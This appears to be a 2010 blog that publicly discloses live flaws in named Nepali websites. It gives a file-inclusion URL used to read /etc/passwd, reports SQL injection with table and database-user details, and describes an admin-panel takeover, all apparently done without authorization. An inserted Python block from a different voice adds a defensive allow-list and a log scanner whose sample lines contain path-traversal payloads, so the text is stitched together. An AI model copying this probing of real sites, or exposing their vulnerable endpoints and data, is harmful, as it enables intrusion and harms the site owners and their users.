I was checking the site of Little Angels College of Management when they were here at KU for the sports week, and after a while I found it to be vulnerable to a file inclusion vulnerability.
The vulnerable URL is:
http://lacm.edu.np/?lacm=[any_file_to_include]
/etc/passwd: (file contents omitted)
And I also got the SQL DB... what the hell, they are keeping the database backup in the website root folder itself.
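As an added example (not code from the blog or from the site it describes), here is the defender's side of the `?lacm=` finding above: a strict allow-list resolver for a page-selection parameter, and a classifier run over constructed access-log lines to flag inclusion attempts. The web root, page names and log lines are assumptions.

```python
import re
from pathlib import Path
from urllib.parse import urlparse, parse_qs

# Hypothetical web root and page allow-list; the real site's page names are unknown.
WEB_ROOT = Path("/var/www/lacm").resolve()
ALLOWED_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}

def resolve_page(lacm_value):
    """Map the lacm parameter to a file only through the allow-list.
    Returns the absolute path, or None for anything that is not a known page."""
    target = ALLOWED_PAGES.get(lacm_value)
    if target is None:
        return None
    path = (WEB_ROOT / target).resolve()
    # Defence in depth: even an allow-listed entry must stay under the web root.
    if WEB_ROOT not in path.parents:
        return None
    return path

# Markers that indicate a file/URL reference rather than a page name
# (traversal, absolute path, URL scheme/wrapper, null byte).
SUSPICIOUS = re.compile(r"(\.\./|\.\.\\|^/|^[a-z]+://|\x00|/etc/)", re.I)

def classify_request(url):
    """Return 'allowed', 'unknown', 'suspicious' or 'no-lacm' for one request URL."""
    values = parse_qs(urlparse(url).query, keep_blank_values=True).get("lacm")
    if not values:
        return "no-lacm"
    value = values[0]            # parse_qs has already percent-decoded it
    if value in ALLOWED_PAGES:
        return "allowed"
    if SUSPICIOUS.search(value):
        return "suspicious"
    return "unknown"

def scan_log(lines):
    """Count classifications over combined-format access-log lines."""
    counts = {}
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        label = classify_request("http://lacm.edu.np" + m.group(1))
        counts[label] = counts.get(label, 0) + 1
    return counts

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Apr/2010:10:00:01 +0545] "GET /?lacm=home HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Apr/2010:10:00:02 +0545] "GET /?lacm=../../../../etc/passwd HTTP/1.1" 200 1824',
    '203.0.113.5 - - [25/Apr/2010:10:00:03 +0545] "GET /?lacm=/etc/passwd HTTP/1.1" 200 1824',
    '198.51.100.7 - - [25/Apr/2010:10:00:04 +0545] "GET /?lacm=news HTTP/1.1" 200 300',
]
```

The "unknown" bucket is worth alerting on too: a page name outside the allow-list should never occur in legitimate traffic.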
See you guys.
Sunday, 25 April 2010
Ekantipur.com [Ekantipur -online news portal of Kantipur Daily] Vulnerability
Most of us know about Ekantipur.com, the online news portal of the Kantipur Daily newspaper. They recently came out with a new design and development, and I was hoping to see a securely coded website, but I was still able to find some holes in it. There is a SQL injection vulnerability in the site of Kantipur Daily which can be used to potentially dump the DB, and then the admin panel can be compromised and possibly we can get a shell on the site.
I hope they will soon fix it, and if they want the information about the vulnerability, I would be happy to help them.
Database tables in the current DB: (listing omitted)
No other dumps are made here for security reasons. I hope they will secure it.
Thank you.
NHNepal.com New Horizons Computer Learning Centers Vulnerability
NHNepal.com is the official site of New Horizons Computer Learning Centers in Nepal, and it is vulnerable to a minor injection attack. This vulnerability was reported to us by someone, and full credit goes to him/her for finding it.
They state:
With over 300 centers in 70 countries, New Horizons is the world’s largest independent IT training company. Over the past 25 years, New Horizons has delivered a full range of IT training and business skills training through innovative learning methods that have transformed businesses and helped over 25 million students reach their goals.
Anyway, a screenshot of the logged-in admin panel from the hacker himself:
Thanks. I hope they secure it soon, or otherwise they will become the victim of another pwnage.
Monday, 12 April 2010
Cybersansar vulnerability re-exposed
One of the most visited sites from Nepal, CyberSansar.com, is vulnerable to lots of serious injections like SQLi and XSS, but today I'm going to post the SQL injection in the site. I hope they will try to fix the site after reading this post. No offense at all to them. Moreover, the MySQL version is greater than 5, so it's easier for the attacker to steal the database information.
User: database => cybernepal3@localhost:cybernepal_3
Tables: (listing omitted)
I'm too lazy to dump each column's data, lol. Anyway, it's just a message to CS about how insecure they are.
Hope they fix this soon.